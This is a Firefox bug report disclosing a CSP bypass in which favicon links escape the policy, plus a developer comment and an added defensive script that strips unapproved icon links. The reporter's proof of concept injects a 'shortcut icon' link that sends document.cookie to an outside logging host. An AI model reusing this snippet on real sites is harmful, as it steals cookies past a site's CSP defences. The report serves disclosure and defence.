Closed Bug 1363031 Opened 2 years ago Closed 2 years ago

Bypass of CSP unsafe-inline mode in Firefox 53.0.2

Categories

(Core :: DOM: Security, defect)

53 Branch
defect
Not set


RESOLVED DUPLICATE of bug 1297156

People

(Reporter: evi1m0.bat, Unassigned)

Details

Attachments

(1 file)

Attached image 1.jpg
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.36 Safari/537.36

Steps to reproduce:

We can use unprotected vectors to bypass the CSP defense.

PoC: http://server.n0tr00t.com/firefox/ffcsp53.0.2.php
---
CSP:
    header("Content-Security-Policy: default-src 'none' 'unsafe-inline';");

Bypass:
    // timestamp used as a unique subdomain so each page load yields a fresh hostname
    x = (new Date()).valueOf();
    document.cookie = "csp=" + escape("SECUREKEY@^#2!@#") + ";";

    // favicon <link> injected into <head>; note the element is appended first and rel/href set afterwards
    ffn0t = document.head.appendChild(document.createElement("link"));
    ffn0t.rel = "shortcut icon";
    ffn0t.href = "http://" + x + ".shortcuticon.ff.vqn3j8.ceye.io/?" + document.cookie;



Actual results:

Bypass


Expected results:

Bypass
Group: firefox-core-security → dom-core-security
Component: Untriaged → DOM: Security
Product: Firefox → Core
Of course, the bypass code also works with the unsafe-inline mode closed.
favicons are currently not governed by CSP in Firefox. They should be, since they can be specified by the document, but the content is not _in_ the document so it's a bit ambiguous.
Group: dom-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 2 years ago
Resolution: --- → DUPLICATE
Duplicate of bug: 1297156
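A page-side mitigation for the gap described in the comment above, as an added example that is not part of this bug report: since the favicon fetch is outside CSP here, the document itself audits every icon link against its own origin and an allow list. ALLOWED_ICON_ORIGINS and the origins in it are hypothetical placeholders.

```javascript
// Added example, not code from the bug report. Allow-listed origins are placeholders.
const ALLOWED_ICON_ORIGINS = new Set(["https://cdn.example.test"]);

// Split a rel attribute into lowercase tokens: "shortcut icon" -> ["shortcut", "icon"].
function relTokens(rel) {
  return String(rel || "").toLowerCase().split(/\s+/).filter(Boolean);
}

// Both "icon" and "shortcut icon" (the variant the report found reliable) count.
function isIconRel(rel) {
  return relTokens(rel).includes("icon");
}

// An icon may only be fetched from the page's own origin or an allow-listed one,
// over http(s). pageOrigin is a parameter so the check also runs outside a browser.
function isAllowedIconHref(href, pageOrigin) {
  if (!href) return false; // no href yet: nothing to allow
  let url;
  try {
    url = new URL(href, pageOrigin);
  } catch (e) {
    return false; // unparsable href: refuse
  }
  if (url.protocol !== "http:" && url.protocol !== "https:") return false;
  return url.origin === pageOrigin || ALLOWED_ICON_ORIGINS.has(url.origin);
}

// Browser hookup: strip offending icon links present now or added later. The PoC
// appends the <link> first and sets rel/href afterwards, so attribute mutations
// must be watched as well as childList additions.
function installFaviconGuard(doc) {
  const audit = (el) => {
    if (el.nodeType === 1 && el.tagName === "LINK" && isIconRel(el.getAttribute("rel")) &&
        !isAllowedIconHref(el.getAttribute("href"), doc.location.origin)) {
      el.remove();
    }
  };
  doc.querySelectorAll("link[rel]").forEach(audit);
  new MutationObserver((records) => {
    for (const r of records) {
      if (r.type === "attributes") audit(r.target);
      r.addedNodes.forEach(audit);
    }
  }).observe(doc.documentElement, {
    childList: true, subtree: true, attributes: true, attributeFilter: ["rel", "href"],
  });
}

if (typeof document !== "undefined") installFaviconGuard(document);
```

The observer runs after the mutation has already happened, so this is detection and cleanup rather than a guarantee; the durable fix is on the browser side, with favicon loads subject to the document's CSP.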
(In reply to Daniel Veditz [:dveditz] from comment #2)
> favicons are currently not governed by CSP in Firefox. They should be, since
> they can be specified by the document, but the content is not _in_ the
> document so it's a bit ambiguous.

Hello, icon == shortcut icon?

I tested it: the success rate with icon is very low, but shortcut icon triggers stably.